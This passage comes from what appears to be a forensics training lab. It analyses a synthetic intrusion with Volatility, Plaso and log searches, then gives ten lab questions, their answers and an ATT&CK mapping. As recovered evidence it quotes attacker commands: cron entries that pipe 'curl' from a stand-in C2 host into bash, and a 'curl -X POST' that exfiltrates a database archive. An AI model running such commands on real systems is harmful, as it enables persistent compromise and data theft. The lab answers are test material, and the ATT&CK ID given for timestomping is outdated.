  • PID 6104 (malware_SYNTHETIC.exe): ESTABLISHED connection to 192.0.2.1:443 (C2 channel)
  • PID 6104: Connection to 10.0.1.10:445 (SMB — lateral movement to domain controller)
  • PID 6500 (synth_payload.dll): Second C2 channel to 192.0.2.1:8080 (data exfiltration)

3.3 Log2Timeline / Plaso

# Generate a super timeline from the forensic image
$ log2timeline.py --storage-file timeline.plaso /mnt/evidence/WIN-DESK-042.E01

# Filter to incident window and export as CSV
$ psort.py -o l2tcsv timeline.plaso \
    "date > '2026-03-15 14:00:00' AND date < '2026-03-15 15:00:00'" \
    -w incident_timeline.csv

# Search for C2 IP across all parsed artifacts
$ psort.py -o l2tcsv timeline.plaso \
    "source_short contains '192.0.2.1' OR message contains '192.0.2.1'" \
    -w c2_hits.csv

Expected output (excerpt from incident_timeline.csv):

date,time,timezone,MACB,source,sourcetype,type,user,host,short,desc
2026-03-15,14:21:43,UTC,..CB,$MFT,NTFS $MFT,Creation Time,-,WIN-DESK-042,FILE Entry,Users/jsmith/Downloads/malware_SYNTHETIC.exe
2026-03-15,14:21:48,UTC,M...,PREFETCH,WinPrefetch,Last Run Time,-,WIN-DESK-042,MALWARE_SYNTHETIC.EXE-A1B2C3D4.pf,[Run count: 1]
2026-03-15,14:22:15,UTC,..CB,$MFT,NTFS $MFT,Creation Time,-,WIN-DESK-042,FILE Entry,Users/jsmith/AppData/Local/Temp/synth_payload.dll
2026-03-15,14:23:01,UTC,M...,PREFETCH,WinPrefetch,Last Run Time,-,WIN-DESK-042,MALWARE_SYNTHETIC.EXE-A1B2C3D4.pf,[Run count: 3]
2026-03-15,14:23:15,UTC,....,EVT/EVTX,WinEVTX,Event Recorded,jsmith,WIN-DESK-042,4688: Process Created,cmd.exe spawned by malware_SYNTHETIC.exe
2026-03-15,14:24:12,UTC,M...,REG,WinRegistry,Key Last Written,-,WIN-DESK-042,Run Key Modified,SyntheticSvcHost added
2026-03-15,14:24:30,UTC,....,EVT/EVTX,WinEVTX,Event Recorded,-,WIN-DESK-042,7045: Service Installed,SyntheticSvc installed

3.4 Log Analysis with grep/awk

# Count failed SSH attempts per source IP
$ grep "Failed password" /var/log/auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -rn
    847 192.0.2.100
      3 10.0.1.50

# Extract all unique usernames attempted
$ grep "Failed password" /var/log/auth.log | grep "192.0.2.100" | \
    awk '{for(i=1;i<=NF;i++) if($i=="for") print $(i+1)}' | sort -u
    admin
    deploy
    oracle
    postgres
    root
    test
    ubuntu
    www-data

# Find successful logins after brute force
$ grep "Accepted" /var/log/auth.log | grep "192.0.2.100"
    Mar 15 14:42:19 linux-jump-01 sshd[5370]: Accepted password for deploy from 192.0.2.100 port 44059 ssh2

# Check for privilege escalation
$ grep "sudo" /var/log/auth.log | grep "deploy"
    Mar 15 14:42:22 linux-jump-01 sudo:   deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/bin/bash

# Check for suspicious cron modifications
$ grep -r "curl\|wget" /var/spool/cron/ /etc/cron.d/ 2>/dev/null
    /var/spool/cron/crontabs/deploy:* * * * * curl -s http://192.0.2.1:8080/beacon | bash
    /etc/cron.d/synthetic-persist:@reboot curl -s http://192.0.2.1:8080/install | bash
    /etc/cron.d/synthetic-persist:*/5 * * * * deploy curl -s http://192.0.2.1:8080/beacon -o /dev/null

Part 4: File Hash Analysis

All hashes below are SYNTHETIC — they do not correspond to any real file.

File SHA-256 (SYNTHETIC) Size Notes
malware_SYNTHETIC.exe 0000000000000000000000000000000000000000000000000000000000000001 112 KB Main dropper
synth_payload.dll 0000000000000000000000000000000000000000000000000000000000000002 84 KB Second-stage payload
tool.sh 0000000000000000000000000000000000000000000000000000000000000003 2.4 KB Linux post-exploitation script
dbdump.tar.gz 0000000000000000000000000000000000000000000000000000000000000004 15.7 MB Exfiltrated data archive

Hash Verification

In a real investigation, you would submit hashes to VirusTotal, MISP, or internal threat intelligence platforms. These SYNTHETIC hashes are intentionally set to all-zeros patterns and will not match any real file. Never submit evidence hashes from a real investigation to public services without authorization.

Part 5: Lab Questions

Answer the following 10 questions using only the synthetic artifacts provided in this lab. Each question can be answered from the evidence above.

Question 1: What was the initial access vector? Identify the exact URL from which the malware was downloaded and the timestamp of the download.

Answer

The malware was downloaded from http://attacker.example/downloads/malware_SYNTHETIC.exe at 2026-03-15T14:21:10Z. This is confirmed by the Chrome Downloads table (id 201) and corroborated by the Chrome History entry (id 850). The user first visited the directory listing at attacker.example/downloads/ at 14:20:30Z.

Question 2: How long elapsed between the malware being written to disk and the first C2 communication? Which artifacts prove this?

Answer
  • File written to disk: 14:21:43Z (from $MFT $STANDARD_INFORMATION Created timestamp)
  • First C2 beacon: 14:23:01Z (from Chrome History entry 847 showing 192.0.2.1/gate.php, and Prefetch third run time)
  • Elapsed time: 1 minute, 18 seconds
  • Corroborating artifacts: $MFT entry, Prefetch file (run count 3, last run 14:23:01Z), Chrome History

Question 3: What evidence of timestomping exists? Explain which timestamp comparison reveals it.

Answer

The $STANDARD_INFORMATION timestamps are all identical (Created, Modified, MFT Modified, Accessed all set to 2026-03-15T14:21:43Z), while the $FILE_NAME Modified and MFT Modified timestamps show 14:23:01Z — approximately 80 seconds later. Since $FILE_NAME timestamps are harder for user-mode tools to modify, this discrepancy indicates the malware stomped its $STANDARD_INFORMATION timestamps after modifying the file. The SI timestamps were reset to match the original creation time to appear unchanged.

Question 4: List all persistence mechanisms the threat actor installed on both Windows and Linux systems. Include registry keys, services, and cron entries.

Answer

Windows (WIN-DESK-042):

  1. Registry Run Key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SyntheticSvcHost pointing to synth_payload.dll,MainEntry (14:24:12Z)
  2. Windows Service: SyntheticSvc — auto-start service running as LocalSystem from user Temp directory (14:24:30Z)

Linux (linux-jump-01):

  1. User Crontab: * * * * * curl -s http://192.0.2.1:8080/beacon | bash — beacons every minute
  2. System Cron: /etc/cron.d/synthetic-persist with @reboot reinstaller and */5 * * * * beacon

Total: 4 persistence mechanisms across 2 hosts.

Question 5: From the Volatility3 netscan output, identify all connections to the C2 infrastructure. Which processes owned these connections and what were the destination ports?

Answer

Two connections to C2 IP 192.0.2.1:

PID Process Destination Port Purpose
6104 malware_SYNTHETIC.exe 192.0.2.1 443 Primary C2 channel (HTTPS)
6500 synth_payload.dll 192.0.2.1 8080 Secondary channel (data exfiltration)

Additionally, PID 6104 had a connection to 10.0.1.10:445 (SMB), indicating lateral movement to the domain controller.

Question 6: How many failed SSH login attempts occurred before the successful compromise of the Linux server? What username was successfully brute-forced, and what did the attacker do immediately after login?

Answer
  • 847 failed SSH attempts from 192.0.2.100 (14:35:01–14:42:18 UTC)
  • Successfully brute-forced username: deploy (attempt 848, at 14:42:19Z)
  • Immediate post-login action: sudo /bin/bash — escalated to root (14:42:22Z, only 3 seconds after login)

Question 7: What data was exfiltrated from the Linux server? Describe the method and destination.

Answer

From .bash_history:

  1. The attacker dumped the MySQL user table: mysql -u root -pSYNTHETIC_PASSWORD_123 -e "SELECT user,host FROM mysql.user;"
  2. Compressed database backups: tar czf /tmp/dbdump.tar.gz /var/backups/mysql/
  3. Exfiltrated via HTTP POST: curl -X POST http://192.0.2.1:8080/exfil -F "data=@/tmp/dbdump.tar.gz"

The exfiltrated archive (dbdump.tar.gz, SYNTHETIC hash 0000...0004) was sent to the C2 server at 192.0.2.1 on port 8080.

Question 8: Reconstruct the lateral movement path. Which hosts were involved, what credentials were used, and which Event IDs document this activity?

Answer

Lateral Movement Path:

WIN-DESK-042 (10.0.1.42) → WIN-SRV-DC01 (10.0.1.10) → linux-jump-01 (10.0.1.100)
  • Hop 1 (Windows → DC): Event 4625 shows failed attempts with administrator, admin, svc_backup credentials from 10.0.1.42. Event 4624 shows successful Type 3 (Network) logon using ACME\jsmith credentials at 14:32:07Z. Volatility netscan confirms SMB (445) connection from PID 6104.
  • Hop 2 (External → Linux): SSH brute force from 192.0.2.100 (likely proxied through C2 infrastructure) with 847 failed attempts (auth.log), then successful deploy login at 14:42:19Z.

Question 9: The threat actor attempted anti-forensics. Identify at least three anti-forensic techniques from the artifacts.

Answer
  1. Timestomping: $STANDARD_INFORMATION timestamps on malware_SYNTHETIC.exe were set to match creation time, hiding subsequent modifications (detected via SI vs. FN timestamp comparison)
  2. History Clearing: history -c command in .bash_history — attempted to clear command history (failed because the file was already written to disk before the clear command executed)
  3. Living-off-the-Land: Used built-in Windows tools (cmd.exe, whoami.exe, ipconfig.exe, net.exe, tasklist.exe, reg.exe) to blend in with normal system activity
  4. Service Name Masquerading: Named the malicious service "Synthetic Health Monitor Service" to appear legitimate

Question 10: Based on the complete artifact analysis, what is the full attack timeline from initial access to data exfiltration? List at least 10 events in chronological order.

Answer
# Time (UTC) Event Evidence Source
1 14:18:45 User visits legitimate news site (possible lure) Chrome History
2 14:20:30 User navigates to attacker's download page Chrome History
3 14:21:10 malware_SYNTHETIC.exe downloaded Chrome Downloads
4 14:21:43 Malware binary written to disk $MFT
5 14:21:48 First execution of malware Prefetch, UserAssist, LNK
6 14:22:15 Second-stage payload (synth_payload.dll) dropped Prefetch, ShimCache
7 14:23:01 C2 beacon established to 192.0.2.1 Chrome History, Volatility netscan
8 14:23:15 Reconnaissance commands executed via cmd.exe Event 4688
9 14:24:12 Registry Run key persistence added Registry
10 14:24:30 Service persistence installed (SyntheticSvc) Event 7045, Registry
11 14:30:45 Lateral movement attempts to DC (failed) Event 4625
12 14:32:07 Successful lateral movement to DC Event 4624
13 14:35:01 SSH brute force against Linux jump server begins auth.log
14 14:42:19 SSH brute force succeeds (user: deploy) auth.log
15 14:42:22 Privilege escalation to root via sudo auth.log
16 ~14:43–44 Post-exploitation recon and tool download .bash_history
17 ~14:45:00 Cron persistence installed crontab, /etc/cron.d
18 ~14:46–48 Database credentials harvested and data exfiltrated .bash_history
19 14:50:00 Reverse shell active on port 4444 /proc/net/tcp

Summary & ATT&CK Mapping

Incident Summary

SYNTHETIC-APT-1 gained initial access to ACME Corp via a drive-by download from attacker.example. The threat actor delivered a two-stage payload (malware_SYNTHETIC.exesynth_payload.dll) that established C2 communications with 192.0.2.1. After conducting local discovery, the actor installed dual persistence mechanisms (Run key + service), attempted lateral movement to the domain controller, and pivoted to a Linux jump server via SSH brute force. On the Linux server, the actor escalated privileges, installed cron-based persistence, harvested database credentials, and exfiltrated compressed database backups to the C2 server.

MITRE ATT&CK Mapping

Tactic Technique ID Technique Name Evidence
Initial Access T1189 Drive-by Compromise Chrome history shows navigation to attacker.example
Execution T1204.002 User Execution: Malicious File LNK file + Prefetch confirm user executed malware_SYNTHETIC.exe
Execution T1059.003 Command and Scripting Interpreter: Windows Command Shell Event 4688: cmd.exe spawned by malware
Execution T1059.004 Command and Scripting Interpreter: Unix Shell curl ... \| bash in .bash_history
Persistence T1547.001 Boot or Logon Autostart: Registry Run Keys HKLM Run key: SyntheticSvcHost
Persistence T1543.003 Create or Modify System Process: Windows Service Event 7045: SyntheticSvc installed
Persistence T1053.003 Scheduled Task/Job: Cron Malicious crontab and /etc/cron.d entries
Privilege Escalation T1548.003 Abuse Elevation Control: Sudo sudo /bin/bash after SSH login
Defense Evasion T1070.003 Indicator Removal: Clear Command History history -c in .bash_history
Defense Evasion T1036 Masquerading Service named "Synthetic Health Monitor Service"
Defense Evasion T1099 Timestomp SI vs FN timestamp discrepancy in $MFT
Credential Access T1110.001 Brute Force: Password Guessing 847 failed SSH attempts from 192.0.2.100
Discovery T1033 System Owner/User Discovery whoami.exe execution
Discovery T1016 System Network Configuration Discovery ipconfig.exe execution
Discovery T1057 Process Discovery tasklist.exe execution
Discovery T1087.001 Account Discovery: Local Account net user and cat /etc/passwd
Lateral Movement T1021.002 Remote Services: SMB/Windows Admin Shares Netscan: connection to 10.0.1.10:445
Lateral Movement T1021.004 Remote Services: SSH Brute-forced SSH to linux-jump-01
Collection T1005 Data from Local System MySQL dump and /var/backups access
Command and Control T1071.001 Application Layer Protocol: Web HTTP C2 to 192.0.2.1 on ports 443 and 8080
Exfiltration T1041 Exfiltration Over C2 Channel curl -X POST to C2 with database archive

Benchmark Tie-In

Control Title Relevance
Nexus SecOps-130 Digital Forensics Program Forensic image collection and chain of custody
Nexus SecOps-131 Evidence Handling Artifact preservation and integrity verification
Nexus SecOps-132 Forensic Analysis Timeline reconstruction and artifact correlation
Nexus SecOps-061 Incident Detection Initial detection of anomalous outbound traffic
Nexus SecOps-065 Incident Containment Isolation of compromised hosts

Further Reading